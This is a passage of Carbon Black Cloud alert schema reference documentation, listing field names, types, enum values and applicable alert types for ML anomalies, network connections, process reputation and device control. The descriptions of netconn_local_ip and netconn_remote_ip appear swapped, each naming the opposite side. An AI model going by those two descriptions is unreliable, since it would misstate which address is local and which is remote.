Name of the K8s policy | String | CONTAINER_RUNTIME |
k8s_policy_id
DEPRECATED |
Unique identifier for the K8s policy | String | CONTAINER_RUNTIME |
k8s_rule
DEPRECATED |
Name of the K8s policy rule | String | CONTAINER_RUNTIME |
k8s_rule_id
DEPRECATED |
Unique identifier for the K8s policy rule | String | CONTAINER_RUNTIME |
k8s_workload_name
DEPRECATED |
K8s Workload Name | String | CONTAINER_RUNTIME |
last_event_timestamp |
Timestamp when the last event in the alert occurred | ISO 8601 UTC timestamp | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
mdr_alert |
Is the alert eligible for review by Carbon Black MDR Analysts? | Boolean | |
mdr_alert_notes_present |
Customer visible notes at the alert level that were added by a MDR analyst | Boolean | |
mdr_determination |
MDR updatable classification of the alert
|
Object | |
mdr_workflow |
MDR-updatable workflow of the alert
|
Object | |
V2.1.0
ml_classification_anomalies[].anomalous_field |
The specific field that is exhibiting anomalous behavior; it helps identify the exact area where the anomaly has occurred. (requires Enterprise EDR) | String | WATCHLIST |
V2.1.0
ml_classification_anomalies[].anomalous_field_baseline_values |
The normal or expected values for the data field; this helps quantify the anomaly’s significance. (requires Enterprise EDR) | String[] | WATCHLIST |
V2.1.0
ml_classification_anomalies[].anomalous_value |
The actual value that was identified as an anomaly; this value contrasts with the baseline values. (requires Enterprise EDR) | String | WATCHLIST |
V2.1.0
ml_classification_anomalies[].anomaly_name |
The anomaly’s name. (requires Enterprise EDR) | String | WATCHLIST |
ml_classification_final_verdict |
Final verdict of the alert, based on the ML models that were used to make the prediction.
NOT_CLASSIFIED
NOT_ANOMALOUS
ANOMALOUS |
String | WATCHLIST |
ml_classification_global_prevalence |
Categories (low/medium/high) used to describe the prevalence of alerts across all regional organizations.
UNKNOWN
LOW
MEDIUM
HIGH |
String | WATCHLIST |
ml_classification_org_prevalence |
Categories (low/medium/high) used to describe the prevalence of alerts within an organization.
UNKNOWN
LOW
MEDIUM
HIGH |
String | WATCHLIST |
netconn_local_ip |
IP address of the remote side of the network connection; stored as dotted decimal | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_local_ipv4 |
IPv4 address of the local side of the network connection; stored as a dotted decimal. Only one of ipv4 and ipv6 fields will be populated. | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_local_ipv6 |
IPv6 address of the local side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated. | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_local_port |
TCP or UDP port used by the local side of the network connection | Integer | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_protocol |
Network protocol of the network connection | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_domain |
Domain name (FQDN) associated with the remote end of the network connection, if available | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_ip |
IP address of the local side of the network connection; stored as dotted decimal | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_ipv4 |
IPv4 address of the remote side of the network connection; stored as dotted decimal. Only one of ipv4 and ipv6 fields will be populated. | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_ipv6 |
IPv6 address of the remote side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated. | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_port |
TCP or UDP port used by the remote side of the network connection; same as netconn_port and event_network_remote_port | Integer | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
org_key |
Unique alphanumeric string that identifies your organization in the Carbon Black Cloud | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_cmdline |
Command line of the parent process | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_effective_reputation |
Effective reputation of the parent process; applied by the sensor when the event occurred
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_guid |
Unique process identifier assigned to the parent process | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_md5 |
MD5 hash of the parent process binary | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_name |
Filesystem path of the parent process binary | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_pid |
Identifier assigned by the operating system to the parent process | Integer | |
parent_reputation |
Reputation of the parent process; applied by the Carbon Black Cloud when the event is initially processed
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_sha256 |
SHA-256 hash of the parent process binary | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_username |
User context in which the parent process was executed | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
policy_applied |
Indicates whether or not a policy has been applied to any event associated with this alert
APPLIED
NOT_APPLIED |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
primary_event_id |
ID of the primary event in the alert | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_cmdline |
Command line executed by the actor process | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_effective_reputation |
Effective reputation of the actor hash
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_guid |
Guid of the process that has fired the alert (optional) | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_issuer |
The certificate authority associated with the process’s certificate | String[] | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_md5 |
MD5 hash of the actor process binary | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_name |
Process names of an alert | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_pid |
PID of the process that has fired the alert (optional) | Integer | |
process_publisher |
Publisher name on the certificate used to sign the Windows or macOS process binary | String[] | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_reputation |
Reputation of the actor process; applied when event is processed by the Carbon Black Cloud
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_sha256 |
SHA-256 hash of the actor process binary | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_username |
User context in which the actor process was executed. MacOS - all users for the PID for fork() and exec() transitions. Linux - process user for exec() events, but in a future sensor release can be multi-valued due to setuid(). | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
product_id |
IDs of the product that identifies USB devices | String | DEVICE_CONTROL |
product_name |
Names of the product that identifies USB devices | String | DEVICE_CONTROL |
reason |
A spoken language written explanation of the what and why the alert occurred and any action taken, usually consisting of 1 to 3 sentences. | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
reason_code |
A unique short-hand code or GUID identifying the particular alert reason | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
remote_is_private
DEPRECATED |
Is the remote information private: true or false | Boolean | CONTAINER_RUNTIME |
remote_k8s_kind
DEPRECATED |
Kind of remote workload; set if the remote side is another workload in the same cluster | String | CONTAINER_RUNTIME |
remote_k8s_namespace
DEPRECATED |
Namespace within the remote workload’s cluster; set if the remote side is another workload in the same cluster | String | CONTAINER_RUNTIME |
remote_k8s_pod_name
DEPRECATED |
Remote workload pod name; set if the remote side is another workload in the same cluster | String | CONTAINER_RUNTIME |
remote_k8s_workload_name
DEPRECATED |
Name of the remote workload; set if the remote side is another workload in the same cluster | String | CONTAINER_RUNTIME |
report_description |
Description of the watchlist report associated with the alert | String | WATCHLIST |
report_id |
Report IDs that contained the IOC that caused a hit | String | WATCHLIST |
report_link |
Link of reports that contained the IOC that caused a hit | String | WATCHLIST |
report_name |
Name of the watchlist report | String | WATCHLIST |
report_tags |
Tags associated with the watchlist report | String[] | WATCHLIST |
rule_category_id |
ID representing the category of the rule_id for certain alert types | String | CB_ANALYTICS HOST_BASED_FIREWALL INTRUSION_DETECTION_SYSTEM |
rule_id |
ID of the rule that triggered an alert; applies to Intrusion Detection System, Host-Based Firewall, TAU Intelligence, and USB Device Control alerts | String | CB_ANALYTICS HOST_BASED_FIREWALL INTRUSION_DETECTION_SYSTEM |
run_state |
Whether the threat in the alert actually ran
DID_NOT_RUN
RAN
UNKNOWN |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
sensor_action |
Actions taken by the sensor, according to the rules of a policy
ALLOW
DENY
TERMINATE |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
serial_number |
Serial numbers of the specific devices | String | DEVICE_CONTROL |
severity |
integer representation of the impact of alert if true positive | Integer | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
threat_id |
ID assigned to a group of alerts with common criteria, based on alert type | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
threat_name |
Name of the threat | String | INTRUSION_DETECTION_SYSTEM |
tms_rule_id |
Detection id | String | INTRUSION_DETECTION_SYSTEM |
ttps |
Other potential malicious activities involved in a threat | String[] | CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM |
type |
Type of alert generated
CB_ANALYTICS
WATCHLIST
DEVICE_CONTROL
CONTAINER_RUNTIME
HOST_BASED_FIREWALL
INTRUSION_DETECTION_SYSTEM
NETWORK_TRAFFIC_ANALYSIS |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
user_update_timestamp |
Timestamp of the last property of an alert changed by a user, such as the alert workflow or determination | ISO 8601 UTC timestamp | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
vendor_id |
IDs of the vendors who produced the devices | String | DEVICE_CONTROL |
vendor_name |
Names of the vendors who produced the devices | String | DEVICE_CONTROL |
version |
The version of the schema being emitted. e.g. 2.1.0 |
String | |
watchlists[].id |
List of watchlists associated with an alert. Alerts are batched hourly
|
String | WATCHLIST |
watchlists[].name |
List of watchlists associated with an alert. Alerts are batched hourly
|
String | WATCHLIST |
workflow |
Current workflow state of an alert. The workflow represents the flow from OPEN to IN_PROGRESS to CLOSED and captures who moved the alert into the current state. The history of these state transitions is available via the alert history route.
|
Object | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
Last modified on April 21, 2025